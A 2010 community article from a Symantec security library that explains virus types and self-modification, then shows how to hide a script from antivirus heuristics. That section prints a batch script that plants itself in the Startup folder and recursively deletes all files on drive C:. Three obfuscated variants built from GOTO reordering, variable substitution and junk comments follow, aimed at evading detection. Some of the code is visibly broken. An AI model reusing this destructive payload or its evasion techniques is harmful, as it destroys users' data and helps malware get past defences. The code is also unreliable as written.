Critical System Protection

 View Only
Back to Library

Types of Viruses, How to hide a Script from the AV 

Jun 27, 2010 05:41 AM

A virus or a worm is a malicious application which after execution harms the OS or the data in the system. The execution may occur automatically when an infected file is accessed, or by a condition such as a date or a directory access. Since the worms are a sort of viruses, the term virus is generally used for calling both worms and viruses. So wherever in this article it is not directly mentioned, virus means both Worms and Viruses.
Characteristic of viruses

Reside in the RAM

  • Some sorts of viruses reside in the RAM in order to monitor the activities and reacting against them, or continuing harming the system.

Leave the memory immediately after execution

  • A group of viruses leave the memory immediately after execution; therefore there will be the least track of them especially if they remove their source files.

Change their codes and the characteristics

  • Some viruses are able to alter their codes in distribution or their method of infecting other files. There are a few viruses which are able to even generate new viruses.
Worms vs. Viruses
  • Virus spreads to another PC only by transferring an infected file to it, but worm does this by itself. In other word, the virus only infects the files and once the file is transferred to another system and executed, then the virus is transferred. However, the worm distributes by methods such as putting an Autorun.inf in the shared folders or even exploiting vulnerabilities in applications and OS.
  • According to the above item, viruses’ distribution methods are much limited than worms.
Note that nowadays most of the malicious applications are using both the distribution methods of viruses and worms together.

Types of Viruses

Stealth Viruses

  • Once such a virus is activated, it infects the files but it does not add itself to them. Instead it puts its code in other place of the disk (even another partition) and since it has the control of the system, redirects the requests to the file to its code. This sort of virus mostly works with root kits and since the root kits can hide any program, the stealth viruses hide themselves using them. Using such a method enables the virus to listen the activities of the antivirus and whenever it requests for the virus, the stealth virus alters or corrupts the data sent to the antivirus and hence it is able to hide itself to be detected by the antivirus programs.

Polymorphic Viruses

  • While infecting a file, these viruses alter the codes they add to the files; therefore in each infection a different virus is added to the file. The alteration may be a reform to a new code but with same activity, or it can be totally a new virus with a new format.

Cavity Viruses (Space Filter)

  • These viruses add themselves to the end of the file and corrupt the header of it. So that the size of the file will remain unchanged although some extra codes are added to the file. The modification to the header of the file redirects the operating system to execute the virus first and afterward, start the file.

Camouflage Viruses

  • This method of hiding is however a simple trick. The virus introduces itself as a harmless or even beneficial program (such as an antivirus) but after execution they do their malicious activities. This method is mostly similar to the method of Trojans.

Shell Viruses

  • These viruses introduce themselves as the main application and the victim file will be a subroutine of the virus. Since the virus covers the victim file as an eggplant shell, they are called so.

Add-on Viruses.

  • Most of viruses are of this type. They add themselves to the start of the file. When the file is executed the virus starts and while finished, the main application starts. Note that this sort of virus does not alter the header of the file.

Intrusive Viruses

  • They are the most aggressive viruses. They completely or partially remove the victim file and overwrite themselves in place. In most of the cases the program will not function properly after the infection.

Companion Viruses

  • They abuse this rule of Microsoft Windows that if there are two files with a same name but one of their extensions is .exe and the other one is .com, if the user just type the name of the file without indicating the extension, the .com file will be executed. Exploiting this, the virus copies itself with a same name of an executable file with .com extension.

File Extension Viruses:

  • By default, Microsoft Windows does not show the known file extensions such as .exe, .bat or as the like. Exploiting this, the virus hides its executable extension (which is com or exe) by adding a fake and harmless extension such as txt, for instance: Bad.txt.exe
Self Modification
This section describes the methods that viruses use to modify themselves in order to hide from being detected by the antviruses, or make it loger.

Encryption by XOR

  • In this method, the virus has two segments: the encoder segment, and the encoded data. The encoded part is the main part of the virus and performs the harmful actions. The task of the encoder segment is to decode the encoded data in each execution, and encoding this part in each infection. The method that the encoders use is to do XOR the data with a variable key and put this key in the new generated virus.

Polymorphic Code

  • These sorts of viruses alter their codes by disordering their sequence. Using GOTO or Variable are the most common methods they use. Another method they use is that they contain several different virus codes inside them, and in each infection they use one of them as the main and functional virus.

Metamorphic Viruses

  • They are the most complicated viruses. This kind of virus is able to alter their code and in each execution, it reprograms itself.
How a script hides from the Antivirus Heuristic
If the signature of the virus is produced, the antivirus will easily detect and eliminate it. But if the virus is not detected yet and therefore there is no signature for it (the Zero-Day period), then the antivirus should estimate if the file is a virus or not. The method that Antivirus uses to do the estimation is called Heuristic and is almost 70% to 80% accurate.
Controversially, the viruses use some methods to hide from this technology which below we will deal with one of them.
First we create a sample virus:

@echo off
Copy 0% C:\Documents and Settings\All Users\Start Menu\Programs\Startup\a.bat
C:
Cd\
Del *.* /f /q /s

Alright, the virus is ready!
It copies itself in the Startup folder of the system and deletes all the files in all the subdirectories of the drive C, and performs this in each restart. It is not a very real virus script but don’t play with the code in a real system!
In the first method, we alter the code using the GOTO method:

@echo off
Goto A
:E
Cd\
Goto B
:A
Copy 0% C:\Documents and Settings\All Users\Start Menu\Programs\Startup\a.bat
Goto C
:B
Del *.* /f /q /s
Exit /B
Goto D
:B
C:
Goto E

This method disturbs the sequence of the commands and hence it will be different from what the Heuristic has in its malicious definitions database.
The next method is to use variable for altering the code:

@Echo off
Set ypy=Copy
Set sk=Menu\Programs\Startup\a.bat
Set ls=0%
Set myj=%myj%
%ypy% %ls% %sk% Menu\Programs\Startup\a.bat
set ls=C:
%ls%
Set ypy=Cd\
%ypy%
Set re=voxdi
Set re=/s
Set ypy=Del
Set sk=sjvprduwtkmw
Set sk=/f
Set ls=wrvyecx
Set ls=*.*
Set myj=/q
%ypy% %ls% %sk% %myj% %re%

Again, this method changes the codes sequence and alters the commands look.
Now, if we combine the above two methods, the result will be much more complicated:

@echo off
set vf=Goto
set vc=A
%vf% %vc%
:E%%
set ik=Cd\
%ik%
Set vc=B
%vf% %vc%
:A%%
Set vc=wuju
Set vc=Copy
rem xfolwhuuuiqwd
Set rd=Users\Start
Set uhq=and
Set uq=Settings\All
Set ik=0%
Set rq=C:\Documents
%vc% %ik% %rq%%pvk% %uhq% %uq% %rd%%rg% Menu\Programs\Startup\a.bat
rem kshxnmudlnigqs
Set vc=C
%vf% %vc%
:B%%
Set ik=*.*
Set vc=qisjgf
Set vc=Del
Set uq=/s
Set rd=%rq%
Set rq=/f
Set uhq=/q
%vc% %ik% %rq% %uhq% %uq%
Set ik=/B
rem vfmcodgyevnutol
Set vc=Exit
%vc% %ik%
rem lrpcttoclg
Set vc=D
%vf% %vc%
:B%%
Set vc=C:
%vc%
Set vc=E
%vf% %vc%
 
Note that these scripts are only some samples and maybe do not work properly, however it is strongly recommended to perform any test and execution in a laboratory and test environment, and avoid applying them on your systems.

Statistics
0 Favorited
0 Views
0 Files
0 Shares
0 Downloads

Tags and Keywords

Comments

Migration User
Sep 20, 2010 08:23 AM

The method introduced in the article, uses the batch programming just as a sample. The mentioned methods can be used on any sort of programming with modifications making it suitable for that kind.

Making the scrip complex especially results in deceiving the Static Scanning method. For more information regarding Scanning Methods, you can refer to this article:

How symantec antivirus system detects viruses:

https://www-secure.symantec.com/connect/articles/how-symantec-antivirus-system-detects-viruses

Migration User
Sep 20, 2010 04:30 AM

I found a malicious string in an autorun.inf file. I can't remember what it does. I deleted it for the user. All I know is that there is a possibility to make a line of command shorter. And it's like reading some sort of Esoteric language - Malbolge, I think.

I've been searching the net on encrypting text files and I mostly get bat to exe programs.

Migration User
Sep 09, 2010 04:21 AM

Respected People...

IT looks this type of .bat file for windows will stay alive only in the current context of your windows session. to extend the functionality of this kinda virus belonging to TSR family.use assembly language using the concept of interrupts to make  your virus invincible.
refer to "GREATBLACK BOOK OF VIRUS" by MARK A LUDWIG..
it will

Migration User
Aug 02, 2010 03:44 PM

>>separating the viruses and worms will not come to successful ending so that the categories boundaries are not certain

I understand and admit.  The boundaries and/or the line of demarcation between the individual category and type of viruses is rather very thin. However if there is an awareness among the people such threats can be minimized.

IMHO, heightened awareness can be considered as an effective mitigation strategy against such threats.

Migration User
Jul 02, 2010 12:04 PM

Dear Deepak,
Thank you for the comment.

These categories in this article can never be fully covering, since a virus or worm always use several different methods to act. As it is mentioned it the article, even separating the viruses and worms will not come to successful ending so that the categories boundaries are not certain and the categories in the article are only the major and highlighted groups.
The quality you mentioned can be performed in any of the above categories and is not a very distinct characteristic, while the mentioned categories are not distinct too!

Migration User
Jun 29, 2010 12:27 AM

Sometimes back they use to call certain viruses as TSR (Terminate and Stay Resident). These breed some people say still exists. Can you expand the article to cover on these too.

Related Entries and Links

No Related Resource entered.